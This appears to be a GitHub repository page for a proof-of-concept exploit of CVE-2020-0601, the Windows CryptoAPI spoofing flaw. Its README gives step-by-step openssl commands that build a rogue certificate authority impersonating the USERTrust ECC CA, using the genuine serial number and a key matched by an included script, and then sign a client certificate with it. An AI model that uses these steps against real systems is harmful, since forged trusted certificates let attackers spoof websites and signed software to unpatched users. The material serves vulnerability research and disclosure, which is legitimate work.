Skip to content
A PoC for CVE-2020-0601
Python
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Fix typo Jan 17, 2020
gen-key.py adding comments Jan 15, 2020
openssl.cnf Add config file Jan 15, 2020

README.md

CryptoAPI

CVE-2020-0601: Windows CryptoAPI Spoofing Vulnerability exploitation. More information in our blog post.

CA certificate

We used the USERTrust ECC Certification Authority

Key template:

$ openssl ecparam -name secp384r1 -genkey -noout -out p384-key.pem -param_enc explicit

To generate a private key which match the public key certificate we used the script gen-key.py (works with Python 3.6 and above). Then to generate the rogue CA:

$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -set_serial 0x5c8b99c55a94c5d27156decd8980cc26

With "C = US, ST = New Jersey, L = Jersey City, O = The USERTRUST Network, CN = USERTrust ECC Certification Authority" parameters

Then we generate the following private key and certificate:

openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 
You can’t perform that action at this time.